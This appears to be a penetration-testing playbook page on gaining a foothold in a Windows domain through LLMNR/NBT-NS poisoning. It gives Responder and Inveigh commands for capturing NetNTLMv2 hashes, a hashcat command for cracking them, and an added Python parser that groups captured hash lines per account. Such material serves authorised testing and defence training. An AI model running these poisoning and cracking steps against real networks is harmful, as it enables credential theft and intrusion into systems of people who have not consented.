Getting a Foothold


Last updated 10 months ago


LLMNR/NBT-NS

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Windows components that serve as fallback methods of host name resolution when DNS fails. Because LLMNR/NBT-NS queries are sent to every host on the local segment, any host on the network can answer them.

This is where we can use Responder to poison these requests. By answering the name query ourselves we perform a Man-in-the-Middle (MITM) attack: the client is tricked into authenticating to us instead of the real server it wanted to reach, and we capture its NetNTLM challenge/response during that authentication.

Using Responder in Linux

Responder is extremely powerful and has many different options available. The most useful ones are:

  • -A Analyze mode, lets us see NBT-NS, BROWSER and LLMNR requests without poisoning them

  • -w Start the WPAD rogue proxy server

  • -f Attempt to fingerprint the remote host OS and version

  • -v Increase verbosity

  • -F and -P Force NTLM or Basic authentication (for WPAD retrieval and for the proxy respectively)

Poisoning authentication challenges using Responder

sudo responder -I tun0 -dwP

Once started, we should leave Responder running for a while to maximise the number of hashes we can obtain. In this case, we received an SMBv2 connection and Responder extracted an NTLMv2-SSP response. Log files are written to the /usr/share/responder/logs directory, and these include any captured hashes.

Cracking an NTLMv2 Hash with Hashcat

hashcat -m 5600 hash.txt password-list.txt --force

With a successfully cracked hash, we can begin to enumerate the domain further.

At this stage, it's best to crack as many hashes as possible, since every extra set of credentials gives us more leverage later in the engagement.
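The lines that Responder writes to its log directory, and that hashcat consumes with -m 5600, have a fixed layout: user::DOMAIN:server challenge:NTProofStr:blob, where the hex blob is the NTLMv2 client challenge structure and carries the client's own timestamp. The following parser is an added example (not part of the playbook or of Responder) that reads such lines, pulls out the account, both challenges and the capture time, and groups captures per account, which is handy when reporting which accounts were exposed and when. The sample lines are constructed in code, not real captures.

```python
# Added example: parse NetNTLMv2-SSP captures in hashcat -m 5600 format.
import re
import struct
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# user::DOMAIN:server_challenge(16 hex):NTProofStr(32 hex):blob(hex)
LINE_RE = re.compile(
    r"^(?P<user>[^:]+)::(?P<domain>[^:]*):(?P<chal>[0-9a-fA-F]{16})"
    r":(?P<proof>[0-9a-fA-F]{32}):(?P<blob>[0-9a-fA-F]+)$")
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)  # FILETIME counts 100 ns ticks from 1601


def parse_capture(line):
    """Return the fields of one capture line, or None if it is not well-formed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    blob = bytes.fromhex(m["blob"])
    # NTLMv2_CLIENT_CHALLENGE: 0x01 0x01, 6 reserved bytes, 8-byte FILETIME (little endian),
    # 8-byte client challenge, 4 reserved bytes, then AV_PAIR list ended by MsvAvEOL.
    if len(blob) < 28 or blob[:2] != b"\x01\x01":
        return None
    (filetime,) = struct.unpack_from("<Q", blob, 8)
    return {"user": m["user"], "domain": m["domain"].upper(),
            "server_challenge": m["chal"].lower(), "client_challenge": blob[16:24].hex(),
            "timestamp": FILETIME_EPOCH + timedelta(microseconds=filetime // 10)}


def summarize(lines):
    """Per DOMAIN\\user: number of captures and the first/last client timestamp seen."""
    per_account = defaultdict(list)
    for line in lines:
        cap = parse_capture(line)
        if cap:
            per_account[f"{cap['domain']}\\{cap['user']}"].append(cap["timestamp"])
    return {acct: {"captures": len(ts), "first_seen": min(ts), "last_seen": max(ts)}
            for acct, ts in per_account.items()}


def make_sample_line(user, domain, ts, client_challenge):
    """Build a constructed (not real) 5600 line whose blob carries the given timestamp."""
    d = ts - FILETIME_EPOCH
    filetime = (d.days * 86400 + d.seconds) * 10_000_000 + d.microseconds * 10
    blob = b"\x01\x01" + bytes(6) + struct.pack("<Q", filetime) + client_challenge + bytes(4) + bytes(4)
    return f"{user}::{domain}:0123456789abcdef:{'aa' * 16}:{blob.hex()}"


SAMPLE_LINES = [  # constructed sample captures for the hypothetical domain CORP
    make_sample_line("jdoe", "CORP", datetime(2024, 1, 15, 12, 0, tzinfo=timezone.utc), bytes(range(8))),
    make_sample_line("jdoe", "corp", datetime(2024, 1, 15, 12, 5, tzinfo=timezone.utc), bytes(8)),
    "not a capture line",
]
```

Note that two captures of the same account never match as strings, since the server challenge and client challenge differ each time; grouping by account is what tells you how many distinct accounts were actually exposed.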

Using Inveigh in Windows

Inveigh works similarly to Responder but is written in PowerShell and C#. It can listen on IPv4 and IPv6 and handles protocols such as LLMNR, DNS, mDNS, NBNS and LDAP.

Using Inveigh in PowerShell

Import-Module .\Inveigh.ps1
(Get-Command Invoke-Inveigh).Parameters

Starting Inveigh

Once we start the program we should see LLMNR and mDNS requests arriving almost immediately.

Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y

Using Inveigh in C#

The PowerShell version is no longer updated, but the C# version is.

.\Inveigh.exe

Once running, the startup output lists the options: those marked with [+] are enabled by default, and those marked with [ ] are disabled.

If we press ESC we enter an interactive console where we can type commands.

Useful commands

  • HELP - Show a help screen with commands we can type

  • GET NTLMV2UNIQUE - Shows unique captured hashes

  • GET NTLMV2USERNAMES - Show the usernames collected so far
